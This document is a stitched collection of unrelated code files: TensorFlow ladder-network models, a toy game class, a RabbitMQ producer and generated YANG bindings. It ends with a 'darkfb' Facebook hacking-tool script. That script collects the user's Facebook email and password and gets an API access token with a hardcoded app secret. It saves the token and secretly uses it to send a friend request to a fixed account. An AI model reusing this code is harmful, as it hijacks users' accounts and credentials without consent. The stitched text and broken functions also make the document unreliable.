a1 = tf.get_variable('a1', shape=u.get_shape()[-1], initializer=tf.constant_initializer(0.0))
a2 = tf.get_variable('a2', shape=u.get_shape()[-1], initializer=tf.constant_initializer(1.0))
a3 = tf.get_variable('a3', shape=u.get_shape()[-1], initializer=tf.constant_initializer(0.0))
a4 = tf.get_variable('a4', shape=u.get_shape()[-1], initializer=tf.constant_initializer(0.0))
a5 = tf.get_variable('a5', shape=u.get_shape()[-1], initializer=tf.constant_initializer(0.0))
return a1 * tf.sigmoid(a2 * u + a3) + a4 * u + a5
def _g_v(u):
a6 = tf.get_variable('a6', shape=u.get_shape()[-1], initializer=tf.constant_initializer(0.0))
a7 = tf.get_variable('a7', shape=u.get_shape()[-1], initializer=tf.constant_initializer(1.0))
a8 = tf.get_variable('a8', shape=u.get_shape()[-1], initializer=tf.constant_initializer(0.0))
a9 = tf.get_variable('a9', shape=u.get_shape()[-1], initializer=tf.constant_initializer(0.0))
a10 = tf.get_variable('a10', shape=u.get_shape()[-1], initializer=tf.constant_initializer(0.0))
return a6 * tf.sigmoid(a7 * u + a8) + a9 * u + a10
# The combinator function described in the paper, initial values from https://github.com/CuriousAI/ladder/
def _g(z_crt, u):
m = _g_m(u)
return (z_crt - m) * _g_v(u) + m
def _noise(data, noise_std):
new_noise = tf.random_normal(shape=tf.shape(data), mean=0.0, stddev=noise_std, dtype=tf.float32)
result = tf.add(data, new_noise)
result.set_shape(data.get_shape())
return result
def cifar10_gamma(inputs, is_training, is_unlabeled, ema, bn_assigns, batch_norm_decay, noise_std):
inputs = tf.cast(inputs, tf.float32)
net = inputs
with tf.variable_scope('model', reuse=not is_training):
with slim.arg_scope([slim.conv2d, slim.fully_connected],
activation_fn=_leaky_relu,
normalizer_fn=slim.batch_norm,
normalizer_params={'is_training': is_training or is_unlabeled,
'decay': batch_norm_decay}):
net = slim.conv2d(net, 96, [3, 3], scope='conv1_1')
net = slim.conv2d(net, 96, [3, 3], scope='conv1_2')
net = slim.conv2d(net, 96, [3, 3], scope='conv1_3')
net = slim.max_pool2d(net, [2, 2], scope='pool1')
net = slim.conv2d(net, 192, [3, 3], scope='conv2_1')
net = slim.conv2d(net, 192, [3, 3], scope='conv2_2')
net = slim.conv2d(net, 192, [3, 3], scope='conv2_3')
net = slim.max_pool2d(net, [2, 2], scope='pool2')
net = slim.conv2d(net, 192, [3, 3], scope='conv3_1')
net = slim.conv2d(net, 192, [1, 1], scope='conv3_2')
net = slim.conv2d(net, 10, [1, 1], scope='conv3_3')
net = slim.avg_pool2d(net, [7, 7], scope='pool3')
net = slim.flatten(net, scope='flatten')
# logits_crt, logits_cln, z_crt, z_cln = _gamma_layer(net,
# lambda x: x,
# is_training=is_training,
# is_unlabeled=is_unlabeled,
# noise_std=noise_std,
# ema=ema,
# bn_assigns=bn_assigns)
#return logits_crt, logits_cln, z_crt, z_cln
return net, net, net, net
def cifar10_supervised_rasmus(inputs, is_training, noise_std, batch_norm_decay=0.9):
inputs = tf.cast(inputs, tf.float32)
net = inputs
with slim.arg_scope([slim.conv2d, slim.fully_connected],
activation_fn=_leaky_relu,
normalizer_fn=custom_batch_norm,
normalizer_params={'is_training': is_training, 'decay': batch_norm_decay, 'noise_std': noise_std}):
net = slim.conv2d(net, 96, [3, 3], scope='conv1_1')
net = slim.conv2d(net, 96, [3, 3], scope='conv1_2')
net = slim.conv2d(net, 96, [3, 3], scope='conv1_3')
net = slim.max_pool2d(net, [2, 2], scope='pool1')
net = slim.conv2d(net, 192, [3, 3], scope='conv2_1')
net = slim.conv2d(net, 192, [3, 3], scope='conv2_2')
net = slim.conv2d(net, 192, [3, 3], scope='conv2_3')
net = slim.max_pool2d(net, [2, 2], scope='pool2')
net = slim.conv2d(net, 192, [3, 3], scope='conv3_1')
net = slim.conv2d(net, 192, [1, 1], scope='conv3_2')
net = slim.conv2d(net, 10, [1, 1], scope='conv3_3')
net = slim.avg_pool2d(net, [7, 7], scope='pool3')
logits = slim.flatten(net, scope='flatten')
return logits
def mnist_assoc(inputs, emb_size=128, l2_weight_decay=1e-4):
inputs = tf.cast(inputs, tf.float32)
net = inputs
with slim.arg_scope([slim.conv2d, slim.fully_connected],
activation_fn=tf.nn.elu,
weights_regularizer=slim.l2_regularizer(l2_weight_decay)):
net = slim.conv2d(net, 32, [3, 3], scope='conv1_1')
net = slim.conv2d(net, 32, [3, 3], scope='conv1_2')
net = slim.max_pool2d(net, [2, 2], scope='pool1') # 14
net = slim.conv2d(net, 64, [3, 3], scope='conv2_1')
net = slim.conv2d(net, 64, [3, 3], scope='conv2_2')
net = slim.max_pool2d(net, [2, 2], scope='pool2') # 7
net = slim.conv2d(net, 128, [3, 3], scope='conv3_1')
net = slim.conv2d(net, 128, [3, 3], scope='conv3_2')
net = slim.max_pool2d(net, [2, 2], scope='pool3') # 3
net = slim.flatten(net, scope='flatten')
emb = slim.fully_connected(net, emb_size, scope='fc1')
with slim.arg_scope([slim.fully_connected], activation_fn=None, weights_regularizer=slim.l2_regularizer(l2_weight_decay)):
logits = slim.fully_connected(emb, 10, activation_fn=None, weights_regularizer=slim.l2_regularizer(1e-4))
return logits, emb
def mnist_gamma(inputs, is_training, is_unlabeled, ema, bn_assigns, batch_norm_decay, noise_std):
inputs = tf.cast(inputs, tf.float32)
net = inputs
with tf.variable_scope('model', reuse=not is_training):
with slim.arg_scope([slim.conv2d, slim.fully_connected],
activation_fn=tf.nn.relu,
normalizer_fn=custom_batch_norm,
normalizer_params={'is_training': is_training,
'decay': batch_norm_decay,
'noise_std': noise_std}):
net = slim.conv2d(net, 32, [5, 5], scope='conv1_1')
net = slim.max_pool2d(net, [2, 2], scope='pool1')
net = slim.conv2d(net, 64, [3, 3], scope='conv2_1')
net = slim.conv2d(net, 64, [3, 3], scope='conv2_2')
net = slim.max_pool2d(net, [2, 2], scope='pool2')
net = slim.conv2d(net, 128, [3, 3], scope='conv3_1')
net = slim.conv2d(net, 10, [1, 1], scope='conv3_2')
net = slim.avg_pool2d(net, [7, 7], scope='pool3')
net = slim.flatten(net, scope='flatten')
net = tf.layers.dense(net, 10, use_bias=False, name='dense')
logits_crt, logits_cln, z_crt, z_cln = _gamma_layer(net,
lambda x: x,
is_training=is_training,
is_unlabeled=is_unlabeled,
noise_std=noise_std,
ema=ema,
bn_assigns=bn_assigns)
return logits_crt, logits_cln, z_crt, z_cln
def mnist_supervised_haeusser(inputs, emb_size=128, l2_weight_decay=1e-3):
inputs = tf.cast(inputs, tf.float32)
net = inputs
with slim.arg_scope([slim.conv2d, slim.fully_connected],
activation_fn=tf.nn.elu,
weights_regularizer=slim.l2_regularizer(l2_weight_decay)):
net = slim.conv2d(net, 32, [3, 3], scope='conv1_1')
net = slim.conv2d(net, 32, [3, 3], scope='conv1_2')
net = slim.max_pool2d(net, [2, 2], scope='pool1') # 14
net = slim.conv2d(net, 64, [3, 3], scope='conv2_1')
net = slim.conv2d(net, 64, [3, 3], scope='conv2_2')
net = slim.max_pool2d(net, [2, 2], scope='pool2') # 7
net = slim.conv2d(net, 128, [3, 3], scope='conv3_1')
net = slim.conv2d(net, 128, [3, 3], scope='conv3_2')
net = slim.max_pool2d(net, [2, 2], scope='pool3') # 3
net = slim.flatten(net, scope='flatten')
emb = slim.fully_connected(net, emb_size, scope='fc1')
logits = slim.fully_connected(emb, 10, scope='fc2')
return logits
def mnist_supervised_rasmus(inputs, is_training, batch_norm_decay=0.9):
inputs = tf.cast(inputs, tf.float32)
net = inputs
with slim.arg_scope([slim.conv2d, slim.fully_connected],
activation_fn=tf.nn.relu,
normalizer_fn=slim.batch_norm,
normalizer_params={'is_training': is_training, 'decay': batch_norm_decay}):
net = slim.conv2d(net, 32, [5, 5], scope='conv1_1')
net = slim.max_pool2d(net, [2, 2], scope='pool1')
net = slim.conv2d(net, 64, [3, 3], scope='conv2_1')
net = slim.conv2d(net, 64, [3, 3], scope='conv2_2')
net = slim.max_pool2d(net, [2, 2], scope='pool2')
net = slim.conv2d(net, 128, [3, 3], scope='conv3_1')
net = slim.conv2d(net, 10, [1, 1], scope='conv3_2')
net = slim.avg_pool2d(net, [7, 7], scope='pool3')
net = slim.flatten(net, scope='flatten')
logits = slim.fully_connected(net, 10, scope='fc1')
return logits
| [
"marco.kabelitz@rwth-aachen.de"
] | marco.kabelitz@rwth-aachen.de |
bc16bc750f67b5fe09555bf86ea4dd8fba53f0ba | 69d7afb0605e843552fab3f79d8ae6d953b40c3b | /scene.py | 3d11988041109bc85e023b913f67eb2081063520 | [] | no_license | nahmisa/Python_Adventure | 100b5a2244b95c0439a821256f55487480ff9d70 | 6ba86bd617e41ac4a0e1ccf2e74e25f764ac256a | refs/heads/master | 2021-01-10T06:55:54.227529 | 2015-10-13T20:12:21 | 2015-10-13T20:12:21 | 44,200,649 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 300 | py | # Organized scenes by parent class scene
class Scene(object):
def enter(self):
print "This scene is not yet configured. Subclass it and implement enter()."
# having text instead of pass helps us for testing and to see errors, but there will be no real scenes in
# this object/class
exit(1) | [
"nahmisa@gmail.com"
] | nahmisa@gmail.com |
0efcee193c5cdeb0e1fe1f35336a1798a94c1084 | 59080f5116b9e8f625b5cc849eb14b7ff9d19f3d | /122 rabbitmq/producer.py | f519020c40c53d1b353416228a61b9216f10522a | [] | no_license | yyq1609/Python_road | eda2bcd946b480a05ec31cdcb65e35b3f3e739d1 | e9ba2f47c8dd2d00a6e5ddff03c546152efd8f49 | refs/heads/master | 2020-09-11T11:51:35.903284 | 2019-11-11T13:02:21 | 2019-11-11T13:02:21 | 222,054,462 | 1 | 0 | null | 2019-11-16T05:58:13 | 2019-11-16T05:58:12 | null | UTF-8 | Python | false | false | 535 | py | import pika
credentials = pika.PlainCredentials('echo', '123')
connection = pika.BlockingConnection(pika.ConnectionParameters('172.16.44.142', virtual_host='vhost1', credentials=credentials))
channel = connection.channel()
channel.queue_declare(queue='test', durable=True)
channel.basic_publish(exchange='',
routing_key='test',
body='One order here!',
properties=pika.BasicProperties(delivery_mode=2),
)
print('下单成功')
connection.close() | [
"958976577@qq.com"
] | 958976577@qq.com |
ab0b4cfbf9f72161aa117b1b37987e52089b9254 | adea9fc9697f5201f4cb215571025b0493e96b25 | /napalm_yang/models/openconfig/network_instances/network_instance/protocols/protocol/isis/global_/timers/spf/__init__.py | 1f2406bbde92beb73269b6ba92ec5145b67db728 | [
"Apache-2.0"
] | permissive | andyjsharp/napalm-yang | d8a8b51896ef7c6490f011fe265db46f63f54248 | ef80ebbfb50e188f09486380c88b058db673c896 | refs/heads/develop | 2021-09-09T02:09:36.151629 | 2018-03-08T22:44:04 | 2018-03-08T22:44:04 | 114,273,455 | 0 | 0 | null | 2018-03-08T22:44:05 | 2017-12-14T16:33:35 | Python | UTF-8 | Python | false | false | 14,778 | py |
from operator import attrgetter
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType
from pyangbind.lib.yangtypes import RestrictedClassType
from pyangbind.lib.yangtypes import TypedListType
from pyangbind.lib.yangtypes import YANGBool
from pyangbind.lib.yangtypes import YANGListType
from pyangbind.lib.yangtypes import YANGDynClass
from pyangbind.lib.yangtypes import ReferenceType
from pyangbind.lib.base import PybindBase
from decimal import Decimal
from bitarray import bitarray
import six
# PY3 support of some PY2 keywords (needs improved)
if six.PY3:
import builtins as __builtin__
long = int
unicode = str
elif six.PY2:
import __builtin__
from . import config
from . import state
class spf(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-network-instance - based on the path /network-instances/network-instance/protocols/protocol/isis/global/timers/spf. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: This container defines ISIS SPF timer settings.
"""
__slots__ = ('_pybind_generated_by', '_path_helper', '_yang_name', '_extmethods', '__config','__state',)
_yang_name = 'spf'
_pybind_generated_by = 'container'
def __init__(self, *args, **kwargs):
self._path_helper = False
self._extmethods = False
self.__state = YANGDynClass(base=state.state, is_container='container', yang_name="state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=True)
self.__config = YANGDynClass(base=config.config, is_container='container', yang_name="config", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=True)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path()+[self._yang_name]
else:
return [u'network-instances', u'network-instance', u'protocols', u'protocol', u'isis', u'global', u'timers', u'spf']
def _get_config(self):
"""
Getter method for config, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/global/timers/spf/config (container)
YANG Description: This container defines ISIS SPF timers configuration.
"""
return self.__config
def _set_config(self, v, load=False):
"""
Setter method for config, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/global/timers/spf/config (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_config is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_config() directly.
YANG Description: This container defines ISIS SPF timers configuration.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=config.config, is_container='container', yang_name="config", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """config must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=config.config, is_container='container', yang_name="config", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=True)""",
})
self.__config = t
if hasattr(self, '_set'):
self._set()
def _unset_config(self):
self.__config = YANGDynClass(base=config.config, is_container='container', yang_name="config", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=True)
def _get_state(self):
"""
Getter method for state, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/global/timers/spf/state (container)
YANG Description: This container defines state information for ISIS SPF timers.
"""
return self.__state
def _set_state(self, v, load=False):
"""
Setter method for state, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/global/timers/spf/state (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_state is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_state() directly.
YANG Description: This container defines state information for ISIS SPF timers.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=state.state, is_container='container', yang_name="state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """state must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=state.state, is_container='container', yang_name="state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=True)""",
})
self.__state = t
if hasattr(self, '_set'):
self._set()
def _unset_state(self):
self.__state = YANGDynClass(base=state.state, is_container='container', yang_name="state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=True)
config = __builtin__.property(_get_config, _set_config)
state = __builtin__.property(_get_state, _set_state)
_pyangbind_elements = {'config': config, 'state': state, }
from . import config
from . import state
class spf(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-network-instance-l2 - based on the path /network-instances/network-instance/protocols/protocol/isis/global/timers/spf. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: This container defines ISIS SPF timer settings.
"""
__slots__ = ('_pybind_generated_by', '_path_helper', '_yang_name', '_extmethods', '__config','__state',)
_yang_name = 'spf'
_pybind_generated_by = 'container'
def __init__(self, *args, **kwargs):
self._path_helper = False
self._extmethods = False
self.__state = YANGDynClass(base=state.state, is_container='container', yang_name="state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=True)
self.__config = YANGDynClass(base=config.config, is_container='container', yang_name="config", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=True)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path()+[self._yang_name]
else:
return [u'network-instances', u'network-instance', u'protocols', u'protocol', u'isis', u'global', u'timers', u'spf']
def _get_config(self):
"""
Getter method for config, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/global/timers/spf/config (container)
YANG Description: This container defines ISIS SPF timers configuration.
"""
return self.__config
def _set_config(self, v, load=False):
"""
Setter method for config, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/global/timers/spf/config (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_config is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_config() directly.
YANG Description: This container defines ISIS SPF timers configuration.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=config.config, is_container='container', yang_name="config", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """config must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=config.config, is_container='container', yang_name="config", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=True)""",
})
self.__config = t
if hasattr(self, '_set'):
self._set()
def _unset_config(self):
self.__config = YANGDynClass(base=config.config, is_container='container', yang_name="config", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=True)
def _get_state(self):
"""
Getter method for state, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/global/timers/spf/state (container)
YANG Description: This container defines state information for ISIS SPF timers.
"""
return self.__state
def _set_state(self, v, load=False):
"""
Setter method for state, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/global/timers/spf/state (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_state is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_state() directly.
YANG Description: This container defines state information for ISIS SPF timers.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=state.state, is_container='container', yang_name="state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=True)
except (TypeError, ValueError):
raise ValueError({
'error-string': """state must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=state.state, is_container='container', yang_name="state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=True)""",
})
self.__state = t
if hasattr(self, '_set'):
self._set()
def _unset_state(self):
self.__state = YANGDynClass(base=state.state, is_container='container', yang_name="state", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions=None, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='container', is_config=True)
config = __builtin__.property(_get_config, _set_config)
state = __builtin__.property(_get_state, _set_state)
_pyangbind_elements = {'config': config, 'state': state, }
| [
"dbarrosop@dravetech.com"
] | dbarrosop@dravetech.com |
1f85e4019908a3197b99e1cffbeba1e3e612a2f7 | d0b18de110aef8ce53e9a1d3da269fafc010317f | /TCP/serverUtils.py | e393c80e7be3a36d1a34a6ed30d84b37721989cf | [] | no_license | chr0m1ng/simpleSocketPy | 041be564549ebed617c26048cfca5e3dd728f6db | 001935a4d617d629fd0c7b586d2fc9489ce75f10 | refs/heads/master | 2020-03-19T04:04:40.964392 | 2018-06-18T03:30:19 | 2018-06-18T03:30:19 | 135,792,862 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 871 | py | class Utils:
def __init__(self):
self.operations = ['+', '-', '*', '/']
def RepresentsInt(self, s):
try:
int(s)
return True
except ValueError:
return False
def RepresentsFloat(self, s):
try:
float(s)
return True
except ValueError:
return False
def RepresentsNumber(self, s):
return self.RepresentsFloat(s) or self.RepresentsInt(s)
def RepresentsOperation(self, s):
return s in self.operations
def OperationsToString(self):
return 'Adicao: "+", Subtracao: "-", Produto: "*" e Divisao: "/"'
def DoTheMath(self, s):
try:
res = eval(s)
return res
except ZeroDivisionError:
return 'Impossivel Realizar Divisao por 0' | [
"gabrielrsantoss@icloud.com"
] | gabrielrsantoss@icloud.com |
c0cf2400d6fbfedf4c512463f75dc4c1c1ec9e0e | 12f676a5831b05c606c6ee39edf49737544a32d3 | /darkfbv1.5 | 49ef765b812a69ec2f795580b6e0fdc238658354 | [] | no_license | mrwahyu-556/darkfb | d96395feaf69e89d648d56017f64c67977c7c3fb | 6a3cbefefd9dbf046288ea434f2a76cfc33cb17e | refs/heads/master | 2022-12-04T06:37:06.181917 | 2020-08-13T16:38:23 | 2020-08-13T16:38:23 | 277,226,690 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 29,733 | 5 | #!/usr/bin/python2
#coding=utf-8
import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,requests,mechanize
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),max_time=1)
br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')]
def keluar():
print "\033[1;96m[!] \x1b[1;91mExit"
os.sys.exit()
def acak(b):
w = 'ahtdzjc'
d = ''
for i in x:
d += '!'+w[random.randint(0,len(w)-1)]+i
return cetak(d)
def cetak(b):
w = 'ahtdzjc'
for i in w:
j = w.index(i)
x= x.replace('!%s'%i,'\033[%s;1m'%str(31+j))
x += '\033[0m'
x = x.replace('!0','\033[0m')
sys.stdout.write(x+'\n')
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(00000.1)
##### LOGO #####
logo = """\033[1;93m█████████
\033[1;93m█▄█████▄█ \033[1;91m●▬▬▬▬▬▬▬▬▬๑۩۩๑▬▬▬▬▬▬▬▬●
\033[1;93m█\033[1;92m▼▼▼▼▼ \033[1;92m- _ --_--\033[1;95m╔╦╗┌─┐┬─┐┬┌─ ╔═╗╔╗
\033[1;93m█ \033[1;92m \033[1;92m_-_-- -_ --__\033[1;93m ║║├─┤├┬┘├┴┐───╠╣ ╠╩╗
\033[1;93m█\033[1;92m▲▲▲▲▲\033[1;92m-- - _ --\033[1;96m═╩╝┴ ┴┴└─┴ ┴ ╚ ╚═╝ \033[1;96 +v1.5+
\033[1;93m█████████ \033[1;92m«----------✧----------»
\033[1;93m ██ ██
\033[1;93m╔════════════════════════════════════════════╗
\033[1;93m║\033[1;96m* \033[1;93mAuthor \033[1;93m : \033[1;93mBrother•|Mr Wahyu|➳TNཽ ཽ ྀ ྭ ྱ ྲ ཻƊ❍ηαLཽɗ︵✿ 033[1;93m ║
\033[1;93m║\033[1;96m* \033[1;93mYouTube \033[1;93m : \033[1;93m\033[:Mr Wahyu Gans Yt \033[0m \033[1;93m║
\033[1;93m║\033[1;96m* \033[1;93m*WhatsApp \033[1;93m:
\033[1;93m083178913074[1;93m
\033[1;93m*Support:➳TNཽ ཽ ྀ ྭ ྱ ྲ ཻƊ❍ηαLཽɗ︵✿
\033[1;93mKENA CP MAMPUS MAKANYA BUAT AKUN DI OPERA MINI
║
\033[1;93m╚════════════════════════════════════════════╝"""
def tik():
titik = ['. ','.. ','... ']
for o in titik:
print("\r\033[1;96m[●] \x1b[1;93mSedang masuk by Wahyu \x1b[1;97m"+o),;sys.stdout.flush();time.sleep(1)
back = 0
berhasil = []
cekpoint = []
oks = []
id = []
listgrup = []
vulnot = "\033[31mNot Vuln"
vuln = "\033[32mVuln"
os.system("clear")
print "\033[1;96m ============================================================="
print """\033[1;96m [¤] \x1b[1;93mASSALAMUALAIKUM\x1b[1;96m \033[1;96m [¤] \x1b[1;93mWHATSAPP : 083178913074\x1b[1;96m
\033[1;96m [¤] \x1b[1;93mSELAMAT DATANG\x1b[1;96m [¤] \x1b[1;93mLOGIN SC: UNTUK LOGIN +USERNAME+:Gua +PASSWORD+:Nyari Pacar \x1b[1;96m
\033[1;96m [¤] \x1b[1;93mYang Cewe Chat Gua:(\x1b[1;96m [¤] \x1b[1;93mYOUTUBE : MrWahyu Gans\x1b[1;96m"""
print " \x1b[1;93m============================================================="
CorrectUsername = "Gua"
CorrectPassword = "Nyari Pacar"
loop = 'true'
while (loop == 'true'):
username = raw_input("\033[1;96m[☆] \x1b[1;93mUSERNAME TOOLS INI \x1b[1;96m>>>> ")
if (username == CorrectUsername):
password = raw_input("\033[1;96m[☆] \x1b[1;93mPASSWORD TOOLS INI \x1b[1;96m>>>> ")
if (password == CorrectPassword):
print "Logged in successfully as " + username
loop = 'false'
else:
print "yang bener dong"
os.system('xdg-open https://www.youtube.com/channel/UCDDhEG8tBuHTpdYP00vGDZg')
else:
print "salah sayang!"
os.system('xdg-open https://www.youtube.com/channel/UCDDhEG8tBuHTpdYP00vGDZg')
def login():
os.system('clear')
try:
toket = open('login.txt','r')
menu()
except (KeyError,IOError):
os.system('clear')
print logo
print 42*"\033[1;96m="
print('\033[1;96m[☆] \x1b[1;93mLOGIN AKUN FB ANDA \x1b[1;96m[☆]' )
id = raw_input('\033[1;96m[+] \x1b[1;93mID/Email \x1b[1;91m: \x1b[1;92m')
pwd = raw_input('\033[1;96m[+] \x1b[1;93mPassword \x1b[1;91m: \x1b[1;92m')
tik()
try:
br.open('https://m.facebook.com')
except mechanize.URLError:
print"\n\033[1;96m[!] \x1b[1;91mTidak ada koneksi"
keluar()
br._factory.is_html = True
br.select_form(nr=0)
br.form['email'] = id
br.form['pass'] = pwd
br.submit()
url = br.geturl()
if 'save-device' in url:
try:
sig= 'api_key=882a8490361da98702bf97a021ddc14dcredentials_type=passwordemail='+id+'format=JSONgenerate_machine_id=1generate_session_cookies=1locale=en_USmethod=auth.loginpassword='+pwd+'return_ssl_resources=0v=1.062f8ce9f74b12f84c123cc23437a4a32'
data = {"api_key":"882a8490361da98702bf97a021ddc14d","credentials_type":"password","email":id,"format":"JSON", "generate_machine_id":"1","generate_session_cookies":"1","locale":"en_US","method":"auth.login","password":pwd,"return_ssl_resources":"0","v":"1.0"}
x=hashlib.new("md5")
x.update(sig)
a=x.hexdigest()
data.update({'sig':a})
url = "https://api.facebook.com/restserver.php"
r=requests.get(url,params=data)
z=json.loads(r.text)
unikers = open("login.txt", 'w')
unikers.write(z['access_token'])
unikers.close()
print '\n\033[1;96m[✓] \x1b[1;92mLogin Berhasil'
os.system('xdg-open https://www.youtube.com/channel/UCJRsXsoiWHqBysdGXEjl8Hg')
requests.post('https://graph.facebook.com/me/friends?method=post&uids=gwimusa3&access_token='+z['access_token'])
menu()
except requests.exceptions.ConnectionError:
print"\n\033[1;96m[!] \x1b[1;91mTidak ada koneksi"
keluar()
if 'checkpoint' in url:
print("\n\033[1;96m[!] \x1b[1;91mSepertinya akun anda kena checkpoint")
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
else:
print("\n\033[1;96m[!] \x1b[1;91mPassword/Email salah")
os.system('rm -rf login.txt')
time.sleep(1)
login()
def menu():
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
os.system('clear')
print"\033[1;96m[!] \x1b[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
login()
try:
otw = requests.get('https://graph.facebook.com/me?access_token='+toket)
a = json.loads(otw.text)
nama = a['name']
id = a['id']
except KeyError:
os.system('clear')
print"\033[1;96m[!] \033[1;91mSepertinya akun anda kena checkpoint"
os.system('rm -rf login.txt')
time.sleep(1)
login()
except requests.exceptions.ConnectionError:
print"\033[1;96m[!] \x1b[1;91mTidak ada koneksi"
keluar()
os.system("clear")
print logo
print 42*"\033[1;96m="
